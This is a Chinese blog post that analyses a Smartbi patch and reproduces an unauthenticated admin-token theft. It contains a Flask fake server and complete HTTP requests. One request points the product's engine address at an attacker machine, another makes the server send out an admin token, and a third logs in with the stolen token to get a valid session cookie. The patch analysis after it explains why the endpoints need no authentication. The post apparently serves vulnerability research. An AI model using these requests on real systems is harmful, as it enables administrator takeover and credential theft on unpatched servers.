smartbi token回调获取登录凭证漏洞

最新推荐文章于 2024-04-25 11:11:58 发布
最新推荐文章于 2024-04-25 11:11:58 发布
阅读量187 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79614903/article/details/133174130
版权

前段时间,Smartbi官方修复了一处权限绕过漏洞。未经授权的攻击者可利用该漏洞,获取管理员token,完全接管管理员权限。于是研究了下相关补丁并进行分析。

0x01分析结果

依据补丁分析,得到如下漏洞复现步骤

第一步,设置EngineAddress为攻击者机器上的http服务地址

首先使用python flask搭建一个fake server,上面只注册了/api/v1/configs/engine/smartbitoken接口,该接口返回一个json响应体

from flask import Flask,jsonify,request


app = Flask(__name__)

@app.route('/api/v1/configs/engine/smartbitoken',methods=["POST"])
def hello():
    print(request.json)
    return jsonify(hi="jello")

if __name__ == "__main__":
    app.run(host="0.0.0.0",port=8000)

图片

使用如下poc,设置EngineAddress为我们的fake server地址http://10.52.32.43:8000,

POST /smartbi/smartbix/api/monitor/setEngineAddress/ HTTP/1.1
Host: 127.0.0.1:18080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 23

http://10.52.32.43:8000

图片

第二步,触发smartbi向我们刚刚设置的EngineAddress外发token

发送如下请求

POST /smartbi//smartbix/api/monitor/token/ HTTP/1.1
Host: 127.0.0.1:18080
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 10

experiment

图片

发送相关请求后,即可在我们的fake server上面看到了携带token的请求

图片

第三步,使用上面获取的token进行登录

POST /smartbi//smartbix/api/monitor/login/ HTTP/1.1
Host: 127.0.0.1:18080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
Content-Length: 47

admin_I8ac3b2d10189e80fe80fea750189ed0084f50082

返回true表示登录成功,其中的cookie就是合法的凭证

图片

0x02分析过程

阅读相关补丁,可知此次漏洞与/smartbix/api/monitor/setServiceAddress有关

图片

 

更进一步查看RejectSmartbixSetAddress类修补的方式,可知与smartbix.datamining.service.MonitorService类的getToken方法有关,该补丁表示如果系统中smartbix.datamining.service.MonitorService存在getToken方法就进行拦截/smartbix/api/monitor/setEngineAddress等一系列接口的请求。

图片

分析smartbix.datamining.service.MonitorService类 从头部的注解可知,该类下的所有路由都不需要认证即可访问

图片

定位到getToken方法 该方法对应的路由的/token,方法内部生成一个token,并在输入的type参数为experiment是将该token发送到系统配置中配置的ENGINE_ADDRESS

图片

图片

这意味着,只要ENGINE_ADDRESS可控,那么我们就能获取到一个合法的token由补丁包的路由/smartbix/api/monitor/setServiceAddress定位到setEngineAddress方法 可知该方法可以未授权配置ENGINE_ADDRESS

图片

那意味着,只需要调用/smartbix/api/monitor/setServiceAddress接口,将ENGINE_ADDRESS设置为我们可控的伪造服务器,那么就可以从请求报文中获取到token。(这个位置经过尝试,发现伪造服务器上需要实现使用POST方法请求的/api/v1/configs/engine/smartbitoken接口,并且,响应内容为json) 获取完token后,就可调用/smartbix/api/monitor/login方法进行登录

图片

0x03其他说明

网络安全渗透丫
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Jmeter接口登录获取参数token报错问题解决方案
08-18
主要介绍了Jmeter接口登录获取参数token报错问题解决方案,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
BIRT Project
birt开发应用
09-04 472
The [b]Business Intelligence and Reporting Tools [/b](BIRT) Project is an open source software project that provides reporting and business intelligence capabilities for rich client and web applicatio...
Apache Doris 2.x 版本【保姆级】安装+使用教程
李指导的博客
04-25 1908
Apache Doris 是一个基于 MPP 架构的高性能、实时的分析型数据库,以极速易用的特点被人们所熟知,仅需亚秒级响应时间即可返海量数据下的查询结果,不仅可以支持高并发的点查询场景,也能支持高吞吐的复杂分析场景。基于此,Apache Doris 能够较好的满足报表分析、即席查询、统一数仓构建、数据湖联邦查询加速等使用场景,用户可以在此之上构建用户行为分析、AB 实验平台、日志检索分析、用户画像分析、订单分析等应用。
SmartBI 权限绕过漏洞复现
weixin_68647219的博客
08-15 3545
Smartbi在特定情况下可被获取用户token,未经授权的攻击者可通过这种方式获取管理员权限,从而以管理员权限接管后台,进一步利用可实现任意代码执行。利用此漏洞需目标可出网。
Smartbi权限绕过漏洞
m0_49025459的博客
08-24 450
该文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者无关。
php获取微信基础接口凭证Access_token
10-18
主要为大家详细介绍了php获取微信基础接口凭证Access_token,具有一定的参考价值,感兴趣的小伙伴们可以参考一下
springboot专栏 008 登录(index页面获取token) 同步
04-16
springboot专栏 008 登录(index页面获取token) 同步
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8286
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
操作系统期末复习笔记!
06-13
操作系统期末复习笔记
pyzmq-22.0.0-cp38-cp38-manylinux2010_i686.whl
06-13
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
pyzmq-25.1.1b2-cp37-cp37m-win_amd64.whl
最新发布
06-13
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
香港某银行-CRYPTO业务资料
06-13
香港某银行--CRYPTO业务资料
【模拟退火算法】TSP.zip
06-13
模拟退火算法解决TSP旅行商问题
局域网组建与维护大作业.zip
06-13
局域网组建与维护大作业.zip
取NC三大报表数据方法
06-13
给外系统提供三大报表数据取数方法,也可以整理成接口进行提供,进行过验证取数
mmexport1718269273275.jpg
06-13
mmexport1718269273275.jpg
pyzmq-25.0.0-cp38-cp38-macosx_10_9_x86_64.whl
06-13
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
基于C语言自制编程语言.zip
06-13
基于C语言自制编程语言
smartbi中loginbytoken 单点登录 如何实现获取所有用户的token
07-25
SmartBI 中实现单点登录(SSO)并获取所有用户的 token,你可以按照以下步骤进行操作: 1. 配置 SmartBI:首先,确保你已经正确配置了 SmartBI 以支持单点登录。这通常涉及在 SmartBI 服务器上设置身份提供者和认证方式等相关配置。 2. 集成 SSO 提供商:与 SmartBI 集成你选择的 SSO 提供商。这可能涉及到在 SSO 提供商的控制台中创建应用程序,并获取客户端 ID 和密钥等凭证。 3. 实现 SSO 登录流程:在你的应用程序中,实现 SSO 登录流程,以便用户可以通过 SSO 提供商进行登录。这通常涉及将用户重定向到 SSO 提供商的登录页面,并获取授权访问用户信息的 token。 4. 获取用户 token:一旦用户完成 SSO 登录流程并返你的应用程序,你可以根据 SSO 提供商的文档使用相应的 API 或 SDK 获取用户的 token。具体的实现方式会根据你选择的 SSO 提供商而有所不同。 5. 存储用户 token:将用户的 token 存储在适当的位置,例如数据库或其他持久化媒介中,以便将来使用。确保对用户 token 进行安全的存储和管理。 需要注意的是,SmartBI 支持多种单点登录协议和身份提供商,例如 SAML、OAuth、LDAP 等。具体的集成步骤和代码示例会根据你选择的身份提供商和 SmartBI 版本而有所不同。你可以查阅 SmartBI 的官方文档或与 SmartBI 支持团队联系,以获得更具体的集成指南和技术支持。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值